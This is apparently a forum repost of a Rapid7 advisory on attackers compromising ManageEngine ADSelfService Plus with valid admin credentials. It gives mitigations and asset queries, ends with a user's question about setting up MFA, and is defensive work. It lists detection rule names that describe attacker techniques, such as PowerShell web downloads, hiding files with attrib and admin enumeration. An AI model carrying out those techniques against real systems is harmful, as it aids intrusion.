|
Rapid7 Managed
Detection and Response (MDR) recently observed several incidents in which
remote attackers have compromised internet-facing systems running
ManageEngine ADSelfService Plus in managed customer environments. The
attackers used valid ADSelfService Plus admin credentials to gain
system-level access.
Our team is working with the vendor to investigate potential root causes and
determine remediations. We are notifying our customers out of an abundance of
caution so that they may take steps to assess and mitigate risk to their
organizations.
Recommendations:
If your organization uses ManageEngine ADSelfService Plus, we strongly
recommend:
- Changing the
“admin” user’s password and enabling multi-factor authentication (MFA)
for this account
- Taking the
affected systems offline entirely if suspicious activity is observed
What can Rapid7 InsightVM users do to determine their
exposure?
InsightVM customers can use Query Builder to find assets running ADSelfService
Plus with the following query: `software.product` `ends with` `ADSelfService
Plus`.
Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset
search for `Software name` `contains` `ADSelfService Plus`.
Does
InsightIDR detect attacker behavior related to this attack?
Rapid7’s existing detection rules (listed below) are able to identify this
attack. We recommend that you review your settings for these detection rules
and confirm they are turned on and set to an appropriate rule action and
priority for your organization:
- Suspicious
Process - Powershell Invoke-WebRequest
- Attacker
Technique - Attrib Sets File Or Directory As Hidden And System
- Attacker
Technique - Enumerating Domain Or Enterprise Admins With Net Command
- Suspicious
Process - Zoho ManageEngine Spawns Child
We have also added the following detection rule and prioritized it as
Critical:
- Attacker
Technique - Hiding ScreenConnect With Attrib
Rapid7 detection logic is continuously reviewed to ensure detections are
based on any observed attacker behavior seen by our Incident Response (IR),
Managed Detection and Response (MDR), and Threat Intelligence and Detection
Engineering (TIDE) teams. Through continuous collaboration and threat
landscape monitoring, we ensure product coverage for the latest techniques
being used by malicious actors and will make updates as necessary.
For up-to-date information on this threat, please refer to this article.
Does anyone know how to configure the admin account for MFA like indicated in the article? |